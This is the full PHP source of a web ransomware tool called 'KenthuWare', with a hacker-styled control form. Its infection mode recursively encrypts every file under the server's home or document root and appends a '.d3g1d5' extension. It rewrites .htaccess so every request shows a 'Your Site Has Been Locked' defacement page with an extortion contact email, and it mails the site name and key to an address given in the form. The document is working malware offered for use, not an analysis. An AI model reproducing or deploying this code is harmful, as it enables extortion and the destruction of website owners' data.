KenthuWare

1. <!DOCTYPE html>
2. <html>
3. <head>
4. <title>KenthuWare</title>
5. <style type="text/css">
6. body {
7. background: #1A1C1F;
8. color: #e2e2e2;
9. }
10. .inpute{
11. border-style: dotted;
12. border-color: #379600;
13. background-color: transparent;
14. color: white;
15. text-align: center;
16. }
17. .selecte{
18. border-style: dotted;
19. border-color: green;
20. background-color: transparent;
21. color: green;
22. }
23. .submite{
24. border-style: dotted;
25. border-color: #4CAF50;
26. background-color: transparent;
27. color: white;
28. }
29. .result{
30. text-align: left;
31. }
32. </style>
33. <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
34. </head>
35. <body>
36. <div class="result">
37. <?php
38. error_reporting(0);
39. set_time_limit(0);
40. ini_set('memory_limit', '-1');
41.  
42. class DNThirTeen {
43. private static $op = 0xffffffff;
44. public static function death($v, $k) {
45. $vl = strlen($v);
46. $filln = (8 - ($vl + 2)) % 8 + 2;
47. if ($filln >= 2 && $filln < 9) {
48. } else {
49. $filln += 8;
50. }
51. $fills = '';
52. for ($i = 0; $i < $filln; $i++) {
53. $fills .= chr(rand(0, 0xff));
54. }
55. $v = chr(($filln - 2) | 0xF8) . $fills . $v;
56. $tmp_l = strlen($v) + 7;
57. $v = pack("a{$tmp_l}", $v);
58. $tr = pack("a8", '');
59. $to = pack("a8", '');
60. $r = '';
61. $o = pack("a8", '');
62. for ($i = 0; $i < strlen($v); $i = $i + 8) {
63. $o = self::_x0r(substr($v, $i, 8), $tr);
64. $tr = self::_x0r(self::prepare_to_death($o, $k), $to);
65. $to = $o;
66. $r .= $tr;
67. }
68. return $r;
69. }
70. public static function life($v, $k) {
71. $l = strlen($v);
72. $prePlain = self::prepare_to_life($v, $k);
73. $pos = (ord($prePlain[0]) & 0x07) + 2;
74. $r = $prePlain;
75. $preCrypt = substr($v, 0, 8);
76. for ($i = 8; $i < $l; $i = $i + 8) {
77. $x = self::_x0r(self::prepare_to_life(self::_x0r(substr($v, $i, $i + 8), $prePlain), $k), $preCrypt);
78. $prePlain = self::_x0r($x, $preCrypt);
79. $preCrypt = substr($v, $i, $i + 8);
80. $r .= $x;
81. }
82. if (substr($r, -7) != pack("a7", '')) {
83. return "";
84. }
85. return substr($r, $pos + 1, -7);
86. }
87. private static function _x0r($a, $b) {
88. $a = self::_str2long($a);
89. $a1 = $a[0];
90. $a2 = $a[1];
91. $b = self::_str2long($b);
92. $b1 = $b[0];
93. $b2 = $b[1];
94. return self::_long2str(($a1 ^ $b1) & self::$op) . self::_long2str(($a2 ^ $b2) & self::$op);
95. }
96. public static function prepare_to_death($v, $k) {
97. $s = 0;
98. $delta = 0x9e3779b9;
99. $n = 16;
100. $k = self::_str2long($k);
101. $v = self::_str2long($v);
102. $z = $v[1];
103. $y = $v[0];
104. for ($i = 0; $i < $n; $i++) {
105. $s += $delta;
106. $y += (self::$op & ($z << 4)) + $k[0] ^ $z + $s ^ (self::$op & ($z >> 5)) + $k[1];
107. $y &= self::$op;
108. $z += (self::$op & ($y << 4)) + $k[2] ^ $y + $s ^ (self::$op & ($y >> 5)) + $k[3];
109. $z &= self::$op;
110. }
111. return self::_long2str($y) . self::_long2str($z);
112. }
113. public static function prepare_to_life($v, $k) {
114. $delta = 0x9e3779b9;
115. $s = ($delta << 4) & self::$op;
116. $n = 16;
117. $v = self::_str2long($v);
118. $k = self::_str2long($k);
119. $y = $v[0];
120. $z = $v[1];
121. $a = $k[0];
122. $b = $k[1];
123. $c = $k[2];
124. $d = $k[3];
125. for ($i = 0; $i < $n; $i++) {
126. $z -= (($y << 4) + $c) ^ ($y + $s) ^ (($y >> 5) + $d);
127. $z &= self::$op;
128. $y -= (($z << 4) + $a) ^ ($z + $s) ^ (($z >> 5) + $b);
129. $y &= self::$op;
130. $s -= $delta;
131. $s &= self::$op;
132. }
133. return self::_long2str($y) . self::_long2str($z);
134. }
135. private static function _str2long($data) {
136. $n = strlen($data);
137. $tmp = unpack('N*', $data);
138. $data_long = array();
139. $j = 0;
140. foreach ($tmp as $value) {
141. $data_long[$j++] = $value;
142. }
143. return $data_long;
144. }
145. private static function _long2str($l) {
146. return pack('N', $l);
147. }
148. }
149. class DN13HandsomeWare {
150. public function DnThirTeenpackInstall() {
151. if (!file_exists(".htad3g1d5")) {
152. rename(".htaccess", ".htad3g1d5");
153. if (fwrite(fopen('.htaccess', 'w'), "#DNThirTeen\r\nDirectoryIndex d3g1d5.php\r\nErrorDocument 404 /d3g1d5.php\r\nErrorDocument 403 /d3g1d5.php\r\nErrorDocument 500 /d3g1d5.php")) {
154. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
155. }
156. if (file_put_contents("d3g1d5.php", '<html><head><title>Pwndz By [!]DNThirTeen</title></head><meta name="Description" content="Pwndz By [!]DNThirTeen"><body bgcolor="black"><center><br><br><br><br><br><br><br><br><br><br><br><br><font size="7" face="Britannic Bold" color="red">L . O . C . K . E . D</font><br><br><font face="Courier New Bold" size="5" color="white">Your Site Has Been Locked By [!]DNThirTeen<br><br><font face="Viner Hand ITC" size="4" color="lime">Contact me : <font color="white">g33k@israelmail.com</font></font><br><br></body><center><embed src="https://arlinjewels.com/deface.swf" height="2%" width="3.5%" type="application/x-shockwave-flash"></embed></html>')) {
157. echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> d3g1d5.php (Default Page)<br>';
158. }
159. }
160. }
161. public function DnThirTeenpackUnstall() {
162. if (file_exists(".htad3g1d5")) {
163. if (unlink(".htaccess") && unlink("d3g1d5.php")) {
164. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
165. echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> d3g1d5.php (Default Page)<br>';
166. }
167. rename(".htad3g1d5", ".htaccess");
168. }
169. }
170. public function plus() {
171. flush();
172. ob_flush();
173. }
174. public function locate() {
175. if (function_exists('posix_getpwuid') && function_exists('posix_getuid')) {
176. $root = posix_getpwuid(posix_getuid());
177. return $root['dir'];
178. } else {
179. return $_SERVER['DOCUMENT_ROOT'];
180. }
181. }
182. public function DnThirTeendirs($dir, $method, $key) {
183. switch ($method) {
184. case '1':
185. DN13HandsomeWare::DnThirTeenpackInstall();
186. break;
187. case '2':
188. DN13HandsomeWare::DnThirTeenpackUnstall();
189. break;
190. }
191. foreach (scandir($dir) as $d) {
192. if ($d != '.' && $d != '..') {
193. $locate = $dir . DIRECTORY_SEPARATOR . $d;
194. if (!is_dir($locate)) {
195. if (DN13HandsomeWare::whitelist($locate, ".htaccess") && DN13HandsomeWare::whitelist($locate, "d3g1d5.php") && DN13HandsomeWare::whitelist($locate, ".htad3g1d5")) {
196. switch ($method) {
197. case '1':
198. DN13HandsomeWare::DnThirTeenEnCry($key, $locate);
199. DN13HandsomeWare::DnThirTeenEnDesDirS($locate, "1");
200. break;
201. case '2':
202. DN13HandsomeWare::DnThirTeenDeCry($key, $locate);
203. DN13HandsomeWare::DnThirTeenEnDesDirS($locate, "2");
204. break;
205. }
206. }
207. } else {
208. DN13HandsomeWare::DnThirTeendirs($locate, $method, $key);
209. }
210. }
211. DN13HandsomeWare::plus();
212. }
213. DN13HandsomeWare::report($key);
214. }
215. public function report($key) {
216. $message .= "=========___Kenthuware___=========\n";
217. $message .= "Website : " . $_SERVER['HTTP_HOST'] . "\n";
218. $message .= "Key : " . $key . "\n";
219. $message .= "=========_Kenthu (2016) Ransomware_=========\n";
220. $subject = "Report Ransomware";
221. $headers = "From: DNThirTeen <g33k@israelmail.com>\r\n";
222. mail($_POST['mail'], $subject, $message, $headers);
223. }
224. public function DnThirTeenEnDesDirS($locate, $method) {
225. switch ($method) {
226. case '1':
227. rename($locate, $locate . ".d3g1d5");
228. break;
229. case '2':
230. $locates = str_replace(".d3g1d5", "", $locate);
231. rename($locate, $locates);
232. break;
233. }
234. }
235. public function DnThirTeenEnCry($key, $locate) {
236. $data = file_get_contents($locate);
237. $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM);
238. if (function_exists('mcrypt_encrypt') && function_exists('mcrypt_decrypt')) {
239. $crypt = $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv);
240. } else {
241. $crypt = $data;
242. }
243. $encrypted = DNThirTeen::death($crypt, pack("H*", $key));
244. if (file_put_contents($locate, "Encrypted By H34rtBl33d RansomWare___" . $encrypted)) {
245. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
246. } else {
247. echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> ' . $locate . ' <br>';
248. }
249. }
250. public function DnThirTeenDeCry($key, $locate) {
251. $data = DNThirTeen::life(str_replace("Encrypted By H34rtBl33d RansomWare___", "", file_get_contents($locate)), pack("H*", $key));
252. if (function_exists('mcrypt_decrypt') && function_exists('mcrypt_encrypt')) {
253. $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
254. $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\0");
255. } else {
256. $decrypted = $data;
257. }
258. if (file_put_contents($locate, $decrypted)) {
259. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
260. } else {
261. echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
262. }
263. }
264. public function whitelist($ext, $name) {
265. $re = "/({$name})/";
266. preg_match($re, $ext, $matches);
267. if ($matches[1]) {
268. return false;
269. }
270. return true;
271. }
272. }
273. if ($_POST['submit']) {
274. switch ($_POST['method']) {
275. case '1':
276. DN13HandsomeWare::DnThirTeendirs(DN13HandsomeWare::locate(), "1", $_POST['key']);
277. break;
278. case '2':
279. DN13HandsomeWare::DnThirTeendirs(DN13HandsomeWare::locate(), "2", $_POST['key']);
280. break;
281. }
282. } else {
283. ?>
284. <pre><font style="font-size:75%;"color="cyan">
285. <b>
286. /\
287. ||
288. ||
289. ||
290. || ~-----~
291. || /===-- ---~~~
292. || ;' /==~- -- - ---~~~
293. || (/ (' /=---- ~~_ --( '
294. || ' / ;' /=---- \__~
295. ' ~==_=~ '(' ~-~~ ~~~~ ~~~--\~'
296. \\ (c_\_ .i. /~-- ~~~-- -~ ( '
297. `\ (}| / / : \ / ~~------~ ~~\ (
298. \ ' ||/ \ |===| /~/ ~~~ \ \(
299. ``~\ ~~\ )~.~_ >._.< _~-~ |`_ ~~-~ )\
300. '-~ { / ) \___/ ( \ |` ` _ ~~ '
301. \ -~\ -<__/ - - L~ -; \\ \ _ _/
302. `` ~~=\ { : }\ ,\ || _ :(
303. \ ~~=\__ \ _/ \_ / ) } _// ( `|'
304. `` , ~\--~=\ \ / / _/ / ' ( '
305. \` } ~ ~~ -~=\ _~_ / \ / \ )^ ( // :_ / '
306. | , _~-' '~~__-_ / - |/ \ (
307. \ ,_--_ _/ \_'---', -~ . \
308. )/ /\ / /\ ,~, \__ _} \_ "~_
309. , { ( _ )'} ~ - \_ ~\ (-:-) "\ ~
310. /'' '' )~ \~_ ~\ )-> \ :| _, "
311. (\ _/)''} | \~_ ~ /~( | :) / }
312. <`` >;,,/ )= \~__ {{{ ' \ =( , , ;
313. {o_o }_/ |v '~__ _ )-v| " : ,"
314. {/"\_) {_/' \~__ ~\_ \\_} ' { /~\
315. ,/! '_/ '~__ _-~ \_' : ' ," ~
316. (''` /,'~___~ | / ," \ ~'
317. '/, ) (-) '~____~"; ," , }
318. /,') / \ / ,~-" '~'
319. ( ''/ / ( ' / / '~'
320. ~ ~ ,, /) , (/( \) ( -) /~'
321. ( ~~ )` ~} ' \)' _/ / ~'
322. { |) /`,--.( }' ' ( / /~'
323. (` ~ ( c|~~| `} ) '/:\ ,'
324. ~ )/``) )) '|), (/ | \)
325. (` (-~(( `~`' ) ' (/ '
326. `~' )'`') '
327. ` ``
328. ________ ________ _________ ___ ___ ___ ________ _________ _______ _______ ________
329. |\ ___ \|\ ___ \|\___ ___|\ \|\ \|\ \|\ __ \|\___ ___|\ ___ \ |\ ___ \ |\ ___ \
330. \ \ \_|\ \ \ \\ \ \|___ \ \_\ \ \\\ \ \ \ \ \|\ \|___ \ \_\ \ __/|\ \ __/|\ \ \\ \ \
331. \ \ \ \\ \ \ \\ \ \ \ \ \ \ \ __ \ \ \ \ _ _\ \ \ \ \ \ \_|/_\ \ \_|/_\ \ \\ \ \
332. \ \ \_\\ \ \ \\ \ \ \ \ \ \ \ \ \ \ \ \ \ \\ \| \ \ \ \ \ \_|\ \ \ \_|\ \ \ \\ \ \
333. \ \_______\ \__\\ \__\ \ \__\ \ \__\ \__\ \__\ \__\\ _\ \ \__\ \ \_______\ \_______\ \__\\ \__\
334. \|_______|\|__| \|__| \|__| \|__|\|__|\|__|\|__|\|__| \|__| \|_______|\|_______|\|__| \|__|
335.  
336. </b>
337. </font></pre><pre>
338. -[ Contact : g33k@israelmail.com ]-<br>
339. </pre>
340. <form action="" method="post">
341. <label>Key : </label>
342. <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
343. <label> Email : </label>
344. <input type="text" name="mail" class="inpute" placeholder="d3g1d5@gmail.com">
345. <select name="method" class="selecte">
346. <option value="1">Infection</option>
347. <option value="2">DeInfection</option>
348. </select>
349. <input type="submit" name="submit" class="submite" value="Submit" />
350. </form>
351. <?php
352. }
353. ?>
354. </div>
355. </body>
356. </html>